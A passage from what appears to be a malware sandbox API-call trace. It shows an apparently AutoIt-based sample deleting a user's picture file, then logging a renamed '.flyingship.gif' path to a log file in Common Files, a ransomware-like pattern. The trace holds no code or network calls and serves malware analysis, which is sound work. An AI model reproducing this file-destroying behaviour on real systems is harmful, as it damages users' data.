out: lpMsg=0x87ee3c) returned 0 [0190.632] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.632] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0190.632] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.632] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.632] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.633] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.633] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.633] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0190.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.633] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.633] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0190.633] FreeLibrary (hLibModule=0x75990000) returned 1 [0190.633] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.634] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0190.634] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.634] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpFilePart=0x0) returned 0x42 [0190.634] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x16d79520, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 0x90af58 [0190.634] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\gx6xg0mp-oop8lyh\\qmjeo8.gif")) returned 1 [0190.636] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x324b5d80, ftCreationTime.dwHighDateTime=0x1d5e326, ftLastAccessTime.dwLowDateTime=0x4c7f4730, ftLastAccessTime.dwHighDateTime=0x1d5df38, ftLastWriteTime.dwLowDateTime=0x16d79520, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x8697, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="QMJeO8.gif", cAlternateFileName="")) returned 0 [0190.636] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0190.638] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0190.639] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0190.639] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0190.639] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0190.640] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0190.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0190.640] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0190.640] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.640] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0190.640] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.640] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0190.641] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.641] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0190.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0190.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0190.641] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.641] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0190.641] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0190.642] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x3001, lpOverlapped=0x0) returned 1 [0190.642] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0190.642] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x3001, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.642] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0190.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0190.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0190.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0190.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\n", cchWideChar=80, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 80 [0190.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x9238c0 [0190.642] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\n", cchWideChar=80, lpMultiByteStr=0x9238c0, cbMultiByte=80, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\GX6xg0MP-Oop8LYh\\QMJeO8.flyingship.gif\r\n", lpUsedDefaultChar=0x0) returned 80 [0190.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0190.642] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0190.642] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9238c0 | out: hHeap=0x8a0000) returned 1 [0190.642] WriteFile (in: hFile=0x158, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x4f, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x4f, lpOverlapped=0x0) returned 1 [0190.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0190.643] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0190.643] CloseHandle (hObject=0x158) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0190.647] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0190.647] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0190.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ee038 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0190.648] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.649] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0190.649] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.649] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.649] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de308 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e18c0 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2a0 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0190.649] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd480 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0190.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0190.650] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0190.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0190.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0190.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0190.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0190.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.650] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0190.650] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0190.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0190.651] 